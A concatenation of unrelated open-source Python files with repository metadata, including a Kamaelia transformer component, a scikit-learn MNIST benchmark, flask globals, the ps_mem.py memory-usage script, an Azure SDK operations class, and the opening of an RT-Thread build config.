# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from Axon.Component import component
"""\
=================
Pure Transformer component
=================
This component applies a function specified at its creation to messages received (a filter).
Example Usage
-------------
To read in lines of text, convert to upper case and then write to the console.
pipeline(
ConsoleReader(),
PureTransformer(lambda x : x.upper()),
ConsoleEchoer()
).run()
"""
class PureTransformer(component):
def __init__(self, function=None):
super(PureTransformer, self).__init__()
if function:
self.processMessage = function
def processMessage(self, msg):
pass
def main(self):
while 1:
yield 1
while self.dataReady("inbox"):
returnval = self.processMessage(self.recv("inbox"))
if returnval != None:
self.send(returnval, "outbox")
while self.dataReady("control"):
msg = self.recv("control")
if isinstance(msg, producerFinished) or isinstance(msg, shutdown):
self.send(producerFinished(self), "signal")
return
self.pause()
|
apache-2.0
|
Ebag333/Pyfa
|
eos/db/gamedata/effect.py
|
1
|
2320
|
# ===============================================================================
# Copyright (C) 2010 Diego Duclos
#
# This file is part of eos.
#
# eos is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# eos is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with eos. If not, see <http://www.gnu.org/licenses/>.
# ===============================================================================
from sqlalchemy import Column, String, Integer, Boolean, Table, ForeignKey
from sqlalchemy.ext.associationproxy import association_proxy
from sqlalchemy.orm import mapper, synonym, relation, deferred
from eos.db import gamedata_meta
from eos.types import Effect, EffectInfo
typeeffects_table = Table("dgmtypeeffects", gamedata_meta,
Column("typeID", Integer, ForeignKey("invtypes.typeID"), primary_key=True, index=True),
Column("effectID", Integer, ForeignKey("dgmeffects.effectID"), primary_key=True))
effects_table = Table("dgmeffects", gamedata_meta,
Column("effectID", Integer, primary_key=True),
Column("effectName", String),
Column("description", String),
Column("published", Boolean),
Column("isAssistance", Boolean),
Column("isOffensive", Boolean))
mapper(EffectInfo, effects_table,
properties={"ID": synonym("effectID"),
"name": synonym("effectName"),
"description": deferred(effects_table.c.description)})
mapper(Effect, typeeffects_table,
properties={"ID": synonym("effectID"),
"info": relation(EffectInfo, lazy=False)})
Effect.name = association_proxy("info", "name")
Effect.description = association_proxy("info", "description")
Effect.published = association_proxy("info", "published")
|
gpl-3.0
|
mhue/scikit-learn
|
benchmarks/bench_mnist.py
|
154
|
6006
|
"""
=======================
MNIST dataset benchmark
=======================
Benchmark on the MNIST dataset. The dataset comprises 70,000 samples
and 784 features. Here, we consider the task of predicting
10 classes - digits from 0 to 9 from their raw images. By contrast to the
covertype dataset, the feature space is homogenous.
Example of output :
[..]
Classification performance:
===========================
Classifier train-time test-time error-rat
------------------------------------------------------------
Nystroem-SVM 105.07s 0.91s 0.0227
ExtraTrees 48.20s 1.22s 0.0288
RandomForest 47.17s 1.21s 0.0304
SampledRBF-SVM 140.45s 0.84s 0.0486
CART 22.84s 0.16s 0.1214
dummy 0.01s 0.02s 0.8973
"""
from __future__ import division, print_function
# Author: Issam H. Laradji
# Arnaud Joly <arnaud.v.joly@gmail.com>
# License: BSD 3 clause
import os
from time import time
import argparse
import numpy as np
from sklearn.datasets import fetch_mldata
from sklearn.datasets import get_data_home
from sklearn.ensemble import ExtraTreesClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.dummy import DummyClassifier
from sklearn.externals.joblib import Memory
from sklearn.kernel_approximation import Nystroem
from sklearn.kernel_approximation import RBFSampler
from sklearn.metrics import zero_one_loss
from sklearn.pipeline import make_pipeline
from sklearn.svm import LinearSVC
from sklearn.tree import DecisionTreeClassifier
from sklearn.utils import check_array
# Memoize the data extraction and memory map the resulting
# train / test splits in readonly mode
memory = Memory(os.path.join(get_data_home(), 'mnist_benchmark_data'),
mmap_mode='r')
@memory.cache
def load_data(dtype=np.float32, order='F'):
"""Load the data, then cache and memmap the train/test split"""
######################################################################
## Load dataset
print("Loading dataset...")
data = fetch_mldata('MNIST original')
X = check_array(data['data'], dtype=dtype, order=order)
y = data["target"]
# Normalize features
X = X / 255
## Create train-test split (as [Joachims, 2006])
print("Creating train-test split...")
n_train = 60000
X_train = X[:n_train]
y_train = y[:n_train]
X_test = X[n_train:]
y_test = y[n_train:]
return X_train, X_test, y_train, y_test
ESTIMATORS = {
"dummy": DummyClassifier(),
'CART': DecisionTreeClassifier(),
'ExtraTrees': ExtraTreesClassifier(n_estimators=100),
'RandomForest': RandomForestClassifier(n_estimators=100),
'Nystroem-SVM':
make_pipeline(Nystroem(gamma=0.015, n_components=1000), LinearSVC(C=100)),
'SampledRBF-SVM':
make_pipeline(RBFSampler(gamma=0.015, n_components=1000), LinearSVC(C=100))
}
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--classifiers', nargs="+",
choices=ESTIMATORS, type=str,
default=['ExtraTrees', 'Nystroem-SVM'],
help="list of classifiers to benchmark.")
parser.add_argument('--n-jobs', nargs="?", default=1, type=int,
help="Number of concurrently running workers for "
"models that support parallelism.")
parser.add_argument('--order', nargs="?", default="C", type=str,
choices=["F", "C"],
help="Allow to choose between fortran and C ordered "
"data")
parser.add_argument('--random-seed', nargs="?", default=0, type=int,
help="Common seed used by random number generator.")
args = vars(parser.parse_args())
print(__doc__)
X_train, X_test, y_train, y_test = load_data(order=args["order"])
print("")
print("Dataset statistics:")
print("===================")
print("%s %d" % ("number of features:".ljust(25), X_train.shape[1]))
print("%s %d" % ("number of classes:".ljust(25), np.unique(y_train).size))
print("%s %s" % ("data type:".ljust(25), X_train.dtype))
print("%s %d (size=%dMB)" % ("number of train samples:".ljust(25),
X_train.shape[0], int(X_train.nbytes / 1e6)))
print("%s %d (size=%dMB)" % ("number of test samples:".ljust(25),
X_test.shape[0], int(X_test.nbytes / 1e6)))
print()
print("Training Classifiers")
print("====================")
error, train_time, test_time = {}, {}, {}
for name in sorted(args["classifiers"]):
print("Training %s ... " % name, end="")
estimator = ESTIMATORS[name]
estimator_params = estimator.get_params()
estimator.set_params(**{p: args["random_seed"]
for p in estimator_params
if p.endswith("random_state")})
if "n_jobs" in estimator_params:
estimator.set_params(n_jobs=args["n_jobs"])
time_start = time()
estimator.fit(X_train, y_train)
train_time[name] = time() - time_start
time_start = time()
y_pred = estimator.predict(X_test)
test_time[name] = time() - time_start
error[name] = zero_one_loss(y_test, y_pred)
print("done")
print()
print("Classification performance:")
print("===========================")
print("{0: <24} {1: >10} {2: >11} {3: >12}"
"".format("Classifier ", "train-time", "test-time", "error-rate"))
print("-" * 60)
for name in sorted(args["classifiers"], key=error.get):
print("{0: <23} {1: >10.2f}s {2: >10.2f}s {3: >12.4f}"
"".format(name, train_time[name], test_time[name], error[name]))
print()
|
bsd-3-clause
|
sdopoku/flask-hello-world
|
venv/lib/python2.7/site-packages/flask/globals.py
|
783
|
1137
|
# -*- coding: utf-8 -*-
"""
flask.globals
~~~~~~~~~~~~~
Defines all the global objects that are proxies to the current
active context.
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
from functools import partial
from werkzeug.local import LocalStack, LocalProxy
def _lookup_req_object(name):
top = _request_ctx_stack.top
if top is None:
raise RuntimeError('working outside of request context')
return getattr(top, name)
def _lookup_app_object(name):
top = _app_ctx_stack.top
if top is None:
raise RuntimeError('working outside of application context')
return getattr(top, name)
def _find_app():
top = _app_ctx_stack.top
if top is None:
raise RuntimeError('working outside of application context')
return top.app
# context locals
_request_ctx_stack = LocalStack()
_app_ctx_stack = LocalStack()
current_app = LocalProxy(_find_app)
request = LocalProxy(partial(_lookup_req_object, 'request'))
session = LocalProxy(partial(_lookup_req_object, 'session'))
g = LocalProxy(partial(_lookup_app_object, 'g'))
|
gpl-2.0
|
40023247/2015cd_0505
|
static/Brython3.1.1-20150328-091302/Lib/unittest/test/_test_warnings.py
|
858
|
2304
|
# helper module for test_runner.Test_TextTestRunner.test_warnings
"""
This module has a number of tests that raise different kinds of warnings.
When the tests are run, the warnings are caught and their messages are printed
to stdout. This module also accepts an arg that is then passed to
unittest.main to affect the behavior of warnings.
Test_TextTestRunner.test_warnings executes this script with different
combinations of warnings args and -W flags and check that the output is correct.
See #10535.
"""
import sys
import unittest
import warnings
def warnfun():
warnings.warn('rw', RuntimeWarning)
class TestWarnings(unittest.TestCase):
# unittest warnings will be printed at most once per type (max one message
# for the fail* methods, and one for the assert* methods)
def test_assert(self):
self.assertEquals(2+2, 4)
self.assertEquals(2*2, 4)
self.assertEquals(2**2, 4)
def test_fail(self):
self.failUnless(1)
self.failUnless(True)
def test_other_unittest(self):
self.assertAlmostEqual(2+2, 4)
self.assertNotAlmostEqual(4+4, 2)
# these warnings are normally silenced, but they are printed in unittest
def test_deprecation(self):
warnings.warn('dw', DeprecationWarning)
warnings.warn('dw', DeprecationWarning)
warnings.warn('dw', DeprecationWarning)
def test_import(self):
warnings.warn('iw', ImportWarning)
warnings.warn('iw', ImportWarning)
warnings.warn('iw', ImportWarning)
# user warnings should always be printed
def test_warning(self):
warnings.warn('uw')
warnings.warn('uw')
warnings.warn('uw')
# these warnings come from the same place; they will be printed
# only once by default or three times if the 'always' filter is used
def test_function(self):
warnfun()
warnfun()
warnfun()
if __name__ == '__main__':
with warnings.catch_warnings(record=True) as ws:
# if an arg is provided pass it to unittest.main as 'warnings'
if len(sys.argv) == 2:
unittest.main(exit=False, warnings=sys.argv.pop())
else:
unittest.main(exit=False)
# print all the warning messages collected
for w in ws:
print(w.message)
|
agpl-3.0
|
dwayne-randle-sr/various-snippets
|
centos/6/usr/local/bin/ps_mem.py
|
1
|
17569
|
#!/usr/bin/env python
# Try to determine how much RAM is currently being used per program.
# Note per _program_, not per process. So for example this script
# will report RAM used by all httpd process together. In detail it reports:
# sum(private RAM for program processes) + sum(Shared RAM for program processes)
# The shared RAM is problematic to calculate, and this script automatically
# selects the most accurate method available for your kernel.
# Licence: LGPLv2
# Author: P@draigBrady.com
# Source: http://www.pixelbeat.org/scripts/ps_mem.py
# V1.0 06 Jul 2005 Initial release
# V1.1 11 Aug 2006 root permission required for accuracy
# V1.2 08 Nov 2006 Add total to output
# Use KiB,MiB,... for units rather than K,M,...
# V1.3 22 Nov 2006 Ignore shared col from /proc/$pid/statm for
# 2.6 kernels up to and including 2.6.9.
# There it represented the total file backed extent
# V1.4 23 Nov 2006 Remove total from output as it's meaningless
# (the shared values overlap with other programs).
# Display the shared column. This extra info is
# useful, especially as it overlaps between programs.
# V1.5 26 Mar 2007 Remove redundant recursion from human()
# V1.6 05 Jun 2007 Also report number of processes with a given name.
# Patch from riccardo.murri@gmail.com
# V1.7 20 Sep 2007 Use PSS from /proc/$pid/smaps if available, which
# fixes some over-estimation and allows totalling.
# Enumerate the PIDs directly rather than using ps,
# which fixes the possible race between reading
# RSS with ps, and shared memory with this program.
# Also we can show non truncated command names.
# V1.8 28 Sep 2007 More accurate matching for stats in /proc/$pid/smaps
# as otherwise could match libraries causing a crash.
# Patch from patrice.bouchand.fedora@gmail.com
# V1.9 20 Feb 2008 Fix invalid values reported when PSS is available.
# Reported by Andrey Borzenkov <arvidjaar@mail.ru>
# V3.3 24 Jun 2014
# http://github.com/pixelb/scripts/commits/master/scripts/ps_mem.py
# Notes:
#
# All interpreted programs where the interpreter is started
# by the shell or with env, will be merged to the interpreter
# (as that's what's given to exec). For e.g. all python programs
# starting with "#!/usr/bin/env python" will be grouped under python.
# You can change this by using the full command line but that will
# have the undesirable affect of splitting up programs started with
# differing parameters (for e.g. mingetty tty[1-6]).
#
# For 2.6 kernels up to and including 2.6.13 and later 2.4 redhat kernels
# (rmap vm without smaps) it can not be accurately determined how many pages
# are shared between processes in general or within a program in our case:
# http://lkml.org/lkml/2005/7/6/250
# A warning is printed if overestimation is possible.
# In addition for 2.6 kernels up to 2.6.9 inclusive, the shared
# value in /proc/$pid/statm is the total file-backed extent of a process.
# We ignore that, introducing more overestimation, again printing a warning.
# Since kernel 2.6.23-rc8-mm1 PSS is available in smaps, which allows
# us to calculate a more accurate value for the total RAM used by programs.
#
# Programs that use CLONE_VM without CLONE_THREAD are discounted by assuming
# they're the only programs that have the same /proc/$PID/smaps file for
# each instance. This will fail if there are multiple real instances of a
# program that then use CLONE_VM without CLONE_THREAD, or if a clone changes
# its memory map while we're checksumming each /proc/$PID/smaps.
#
# I don't take account of memory allocated for a program
# by other programs. For e.g. memory used in the X server for
# a program could be determined, but is not.
#
# FreeBSD is supported if linprocfs is mounted at /compat/linux/proc/
# FreeBSD 8.0 supports up to a level of Linux 2.6.16
import getopt
import time
import errno
import os
import sys
try:
# md5 module is deprecated on python 2.6
# so try the newer hashlib first
import hashlib
md5_new = hashlib.md5
except ImportError:
import md5
md5_new = md5.new
# The following exits cleanly on Ctrl-C or EPIPE
# while treating other exceptions as before.
def std_exceptions(etype, value, tb):
sys.excepthook = sys.__excepthook__
if issubclass(etype, KeyboardInterrupt):
pass
elif issubclass(etype, IOError) and value.errno == errno.EPIPE:
pass
else:
sys.__excepthook__(etype, value, tb)
sys.excepthook = std_exceptions
#
# Define some global variables
#
PAGESIZE = os.sysconf("SC_PAGE_SIZE") / 1024 #KiB
our_pid = os.getpid()
have_pss = 0
class Proc:
def __init__(self):
uname = os.uname()
if uname[0] == "FreeBSD":
self.proc = '/compat/linux/proc'
else:
self.proc = '/proc'
def path(self, *args):
return os.path.join(self.proc, *(str(a) for a in args))
def open(self, *args):
try:
return open(self.path(*args))
except (IOError, OSError):
val = sys.exc_info()[1]
if (val.errno == errno.ENOENT or # kernel thread or process gone
val.errno == errno.EPERM):
raise LookupError
raise
proc = Proc()
#
# Functions
#
def parse_options():
try:
long_options = ['split-args', 'help', 'total']
opts, args = getopt.getopt(sys.argv[1:], "shtp:w:", long_options)
except getopt.GetoptError:
sys.stderr.write(help())
sys.exit(3)
# ps_mem.py options
split_args = False
pids_to_show = None
watch = None
only_total = False
for o, a in opts:
if o in ('-s', '--split-args'):
split_args = True
if o in ('-t', '--total'):
only_total = True
if o in ('-h', '--help'):
sys.stdout.write(help())
sys.exit(0)
if o in ('-p',):
try:
pids_to_show = [int(x) for x in a.split(',')]
except:
sys.stderr.write(help())
sys.exit(3)
if o in ('-w',):
try:
watch = int(a)
except:
sys.stderr.write(help())
sys.exit(3)
return (split_args, pids_to_show, watch, only_total)
def help():
help_msg = 'ps_mem.py - Show process memory usage\n'\
'\n'\
'-h Show this help\n'\
'-w <N> Measure and show process memory every N seconds\n'\
'-p <pid>[,pid2,...pidN] Only show memory usage PIDs in the specified list\n' \
'-s, --split-args Show and separate by, all command line arguments\n' \
'-t, --total Show only the total value\n'
return help_msg
#(major,minor,release)
def kernel_ver():
kv = proc.open('sys/kernel/osrelease').readline().split(".")[:3]
last = len(kv)
if last == 2:
kv.append('0')
last -= 1
while last > 0:
for char in "-_":
kv[last] = kv[last].split(char)[0]
try:
int(kv[last])
except:
kv[last] = 0
last -= 1
return (int(kv[0]), int(kv[1]), int(kv[2]))
#return Private,Shared
#Note shared is always a subset of rss (trs is not always)
def getMemStats(pid):
global have_pss
mem_id = pid #unique
Private_lines = []
Shared_lines = []
Pss_lines = []
Rss = (int(proc.open(pid, 'statm').readline().split()[1])
* PAGESIZE)
if os.path.exists(proc.path(pid, 'smaps')): #stat
digester = md5_new()
for line in proc.open(pid, 'smaps').readlines(): #open
# Note we checksum smaps as maps is usually but
# not always different for separate processes.
digester.update(line.encode('latin1'))
if line.startswith("Shared"):
Shared_lines.append(line)
elif line.startswith("Private"):
Private_lines.append(line)
elif line.startswith("Pss"):
have_pss = 1
Pss_lines.append(line)
mem_id = digester.hexdigest()
Shared = sum([int(line.split()[1]) for line in Shared_lines])
Private = sum([int(line.split()[1]) for line in Private_lines])
#Note Shared + Private = Rss above
#The Rss in smaps includes video card mem etc.
if have_pss:
pss_adjust = 0.5 # add 0.5KiB as this avg error due to trunctation
Pss = sum([float(line.split()[1])+pss_adjust for line in Pss_lines])
Shared = Pss - Private
elif (2,6,1) <= kernel_ver() <= (2,6,9):
Shared = 0 #lots of overestimation, but what can we do?
Private = Rss
else:
Shared = int(proc.open(pid, 'statm').readline().split()[2])
Shared *= PAGESIZE
Private = Rss - Shared
return (Private, Shared, mem_id)
def getCmdName(pid, split_args):
cmdline = proc.open(pid, 'cmdline').read().split("\0")
if cmdline[-1] == '' and len(cmdline) > 1:
cmdline = cmdline[:-1]
path = proc.path(pid, 'exe')
try:
path = os.readlink(path)
# Some symlink targets were seen to contain NULs on RHEL 5 at least
# https://github.com/pixelb/scripts/pull/10, so take string up to NUL
path = path.split('\0')[0]
except OSError:
val = sys.exc_info()[1]
if (val.errno == errno.ENOENT or # either kernel thread or process gone
val.errno == errno.EPERM):
raise LookupError
raise
if split_args:
return " ".join(cmdline)
if path.endswith(" (deleted)"):
path = path[:-10]
if os.path.exists(path):
path += " [updated]"
else:
#The path could be have prelink stuff so try cmdline
#which might have the full path present. This helped for:
#/usr/libexec/notification-area-applet.#prelink#.fX7LCT (deleted)
if os.path.exists(cmdline[0]):
path = cmdline[0] + " [updated]"
else:
path += " [deleted]"
exe = os.path.basename(path)
cmd = proc.open(pid, 'status').readline()[6:-1]
if exe.startswith(cmd):
cmd = exe #show non truncated version
#Note because we show the non truncated name
#one can have separated programs as follows:
#584.0 KiB + 1.0 MiB = 1.6 MiB mozilla-thunder (exe -> bash)
# 56.0 MiB + 22.2 MiB = 78.2 MiB mozilla-thunderbird-bin
return cmd
#The following matches "du -h" output
#see also human.py
def human(num, power="Ki"):
powers = ["Ki", "Mi", "Gi", "Ti"]
while num >= 1000: #4 digits
num /= 1024.0
power = powers[powers.index(power)+1]
return "%.1f %s" % (num, power)
def cmd_with_count(cmd, count):
if count > 1:
return "%s (%u)" % (cmd, count)
else:
return cmd
#Warn of possible inaccuracies
#2 = accurate & can total
#1 = accurate only considering each process in isolation
#0 = some shared mem not reported
#-1= all shared mem not reported
def shared_val_accuracy():
"""http://wiki.apache.org/spamassassin/TopSharedMemoryBug"""
kv = kernel_ver()
if kv[:2] == (2,4):
if proc.open('meminfo').read().find("Inact_") == -1:
return 1
return 0
elif kv[:2] == (2,6):
pid = os.getpid()
if os.path.exists(proc.path(pid, 'smaps')):
if proc.open(pid, 'smaps').read().find("Pss:")!=-1:
return 2
else:
return 1
if (2,6,1) <= kv <= (2,6,9):
return -1
return 0
elif kv[0] > 2:
return 2
else:
return 1
def show_shared_val_accuracy( possible_inacc, only_total=False ):
level = ("Warning","Error")[only_total]
if possible_inacc == -1:
sys.stderr.write(
"%s: Shared memory is not reported by this system.\n" % level
)
sys.stderr.write(
"Values reported will be too large, and totals are not reported\n"
)
elif possible_inacc == 0:
sys.stderr.write(
"%s: Shared memory is not reported accurately by this system.\n" % level
)
sys.stderr.write(
"Values reported could be too large, and totals are not reported\n"
)
elif possible_inacc == 1:
sys.stderr.write(
"%s: Shared memory is slightly over-estimated by this system\n"
"for each program, so totals are not reported.\n" % level
)
sys.stderr.close()
if only_total and possible_inacc != 2:
sys.exit(1)
def get_memory_usage( pids_to_show, split_args, include_self=False, only_self=False ):
cmds = {}
shareds = {}
mem_ids = {}
count = {}
for pid in os.listdir(proc.path('')):
if not pid.isdigit():
continue
pid = int(pid)
# Some filters
if only_self and pid != our_pid:
continue
if pid == our_pid and not include_self:
continue
if pids_to_show is not None and pid not in pids_to_show:
continue
try:
cmd = getCmdName(pid, split_args)
except LookupError:
#operation not permitted
#kernel threads don't have exe links or
#process gone
continue
try:
private, shared, mem_id = getMemStats(pid)
except RuntimeError:
continue #process gone
if shareds.get(cmd):
if have_pss: #add shared portion of PSS together
shareds[cmd] += shared
elif shareds[cmd] < shared: #just take largest shared val
shareds[cmd] = shared
else:
shareds[cmd] = shared
cmds[cmd] = cmds.setdefault(cmd, 0) + private
if cmd in count:
count[cmd] += 1
else:
count[cmd] = 1
mem_ids.setdefault(cmd, {}).update({mem_id:None})
#Add shared mem for each program
total = 0
for cmd in cmds:
cmd_count = count[cmd]
if len(mem_ids[cmd]) == 1 and cmd_count > 1:
# Assume this program is using CLONE_VM without CLONE_THREAD
# so only account for one of the processes
cmds[cmd] /= cmd_count
if have_pss:
shareds[cmd] /= cmd_count
cmds[cmd] = cmds[cmd] + shareds[cmd]
total += cmds[cmd] #valid if PSS available
sorted_cmds = sorted(cmds.items(), key=lambda x:x[1])
sorted_cmds = [x for x in sorted_cmds if x[1]]
return sorted_cmds, shareds, count, total
def print_header():
sys.stdout.write(" Private + Shared = RAM used\tProgram\n\n")
def print_memory_usage(sorted_cmds, shareds, count, total):
for cmd in sorted_cmds:
sys.stdout.write("%8sB + %8sB = %8sB\t%s\n" %
(human(cmd[1]-shareds[cmd[0]]),
human(shareds[cmd[0]]), human(cmd[1]),
cmd_with_count(cmd[0], count[cmd[0]])))
if have_pss:
sys.stdout.write("%s\n%s%8sB\n%s\n" %
("-" * 33, " " * 24, human(total), "=" * 33))
def verify_environment():
if os.geteuid() != 0:
sys.stderr.write("Sorry, root permission required.\n")
if __name__ == '__main__':
sys.stderr.close()
sys.exit(1)
try:
kv = kernel_ver()
except (IOError, OSError):
val = sys.exc_info()[1]
if val.errno == errno.ENOENT:
sys.stderr.write(
"Couldn't access " + proc.path('') + "\n"
"Only GNU/Linux and FreeBSD (with linprocfs) are supported\n")
sys.exit(2)
else:
raise
if __name__ == '__main__':
verify_environment()
split_args, pids_to_show, watch, only_total = parse_options()
if not only_total:
print_header()
if watch is not None:
try:
sorted_cmds = True
while sorted_cmds:
sorted_cmds, shareds, count, total = get_memory_usage( pids_to_show, split_args )
if only_total and have_pss:
sys.stdout.write(human(total).replace(' ','')+'B\n')
elif not only_total:
print_memory_usage(sorted_cmds, shareds, count, total)
time.sleep(watch)
else:
sys.stdout.write('Process does not exist anymore.\n')
except KeyboardInterrupt:
pass
else:
# This is the default behavior
sorted_cmds, shareds, count, total = get_memory_usage( pids_to_show, split_args )
if only_total and have_pss:
sys.stdout.write(human(total).replace(' ','')+'B\n')
elif not only_total:
print_memory_usage(sorted_cmds, shareds, count, total)
# We must close explicitly, so that any EPIPE exception
# is handled by our excepthook, rather than the default
# one which is reenabled after this script finishes.
sys.stdout.close()
vm_accuracy = shared_val_accuracy()
show_shared_val_accuracy( vm_accuracy, only_total )
|
gpl-3.0
|
Azure/azure-sdk-for-python
|
sdk/testbase/azure-mgmt-testbase/azure/mgmt/testbase/aio/operations/_test_summaries_operations.py
|
1
|
9021
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class TestSummariesOperations:
"""TestSummariesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~test_base.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name: str,
test_base_account_name: str,
**kwargs: Any
) -> AsyncIterable["_models.TestSummaryListResult"]:
"""Lists the Test Summaries of all the packages under a Test Base Account.
:param resource_group_name: The name of the resource group that contains the resource.
:type resource_group_name: str
:param test_base_account_name: The resource name of the Test Base Account.
:type test_base_account_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either TestSummaryListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~test_base.models.TestSummaryListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.TestSummaryListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-12-16-preview"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'testBaseAccountName': self._serialize.url("test_base_account_name", test_base_account_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('TestSummaryListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.TestBase/testBaseAccounts/{testBaseAccountName}/testSummaries'} # type: ignore
async def get(
self,
resource_group_name: str,
test_base_account_name: str,
test_summary_name: str,
**kwargs: Any
) -> "_models.TestSummaryResource":
"""Gets a Test Summary with specific name from all the Test Summaries of all the packages under a
Test Base Account.
:param resource_group_name: The name of the resource group that contains the resource.
:type resource_group_name: str
:param test_base_account_name: The resource name of the Test Base Account.
:type test_base_account_name: str
:param test_summary_name: The name of the Test Summary.
:type test_summary_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: TestSummaryResource, or the result of cls(response)
:rtype: ~test_base.models.TestSummaryResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.TestSummaryResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-12-16-preview"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'testBaseAccountName': self._serialize.url("test_base_account_name", test_base_account_name, 'str'),
'testSummaryName': self._serialize.url("test_summary_name", test_summary_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('TestSummaryResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.TestBase/testBaseAccounts/{testBaseAccountName}/testSummaries/{testSummaryName}'} # type: ignore
|
mit
|
ArdaFu/rt-thread
|
bsp/stm32/stm32l476-st-nucleo/rtconfig.py
|
7
|
4069
|
import os
# toolchains options
ARCH='arm'
CPU='cortex-m4'
CROSS_TOOL='gcc'
# bsp lib config
BSP_LIBRARY_TYPE = None
if os.getenv('RTT_CC'):
CROSS_TOOL = os.getenv('RTT_CC')
if os.getenv('RTT_ROOT'):
RTT_ROOT = os.getenv('RTT_ROOT')
# cross_tool provides the cross compiler
# EXEC_PATH is the compiler execute path, for example, CodeSourcery, Keil MDK, IAR
if CROSS_TOOL == 'gcc':
PLATFORM = 'gcc'
EXEC_PATH = r'C:\Users\XXYYZZ'
elif CROSS_TOOL == 'keil':
PLATFORM = 'armcc'
EXEC_PATH = r'C:/Keil_v5'
elif CROSS_TOOL == 'iar':
PLATFORM = 'iar'
EXEC_PATH = r'C:/Program Files (x86)/IAR Systems/Embedded Workbench 8.0'
if os.getenv('RTT_EXEC_PATH'):
EXEC_PATH = os.getenv('RTT_EXEC_PATH')
BUILD = 'debug'
if PLATFORM == 'gcc':
# toolchains
